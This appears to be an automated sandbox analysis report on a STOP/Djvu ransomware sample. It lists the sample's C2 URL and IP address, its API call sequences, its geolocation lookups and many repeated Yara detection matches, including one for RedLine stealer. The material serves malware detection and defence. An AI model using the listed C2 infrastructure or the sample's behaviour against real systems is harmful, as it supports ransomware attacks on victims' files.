Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: bP5g4FsSJk.exe, 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\nedunesa\gihex\gakubeki53_gaboru\lulod mamere\hexumax.pdb source: bP5g4FsSJk.exe

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_00410160
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_0040F730

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://acacaca.org/test2/get.php

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 162.0.217.254 162.0.217.254

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: bP5g4FsSJk.exe, 00000001.00000003.278926665.000000000093D000.00000004.00000020.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000003.278864310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000002.287027145.000000000093D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bP5g4FsSJk.exe, 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: bP5g4FsSJk.exe, 00000001.00000002.286817281.000000000090D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: bP5g4FsSJk.exe, 00000001.00000002.286817281.000000000090D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/Y%
Source: bP5g4FsSJk.exe, 00000001.00000002.286593471.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: bP5g4FsSJk.exe, 00000001.00000002.286414138.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json6
Source: bP5g4FsSJk.exe, 00000001.00000002.286593471.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonY
Source: bP5g4FsSJk.exe, 00000001.00000002.286593471.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsong
Source: bP5g4FsSJk.exe, 00000001.00000002.286414138.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: bP5g4FsSJk.exe, 00000001.00000002.286414138.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsont

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic

HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua

Source: unknown

HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49737 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bP5g4FsSJk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.bP5g4FsSJk.exe.42d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.bP5g4FsSJk.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bP5g4FsSJk.exe PID: 5468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bP5g4FsSJk.exe PID: 5604, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.0.bP5g4FsSJk.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.bP5g4FsSJk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.bP5g4FsSJk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.bP5g4FsSJk.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.bP5g4FsSJk.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.271002067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bP5g4FsSJk.exe PID: 5468, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bP5g4FsSJk.exe PID: 5604, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: bP5g4FsSJk.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.0.bP5g4FsSJk.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.bP5g4FsSJk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.2.bP5g4FsSJk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.bP5g4FsSJk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.bP5g4FsSJk.exe.42d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
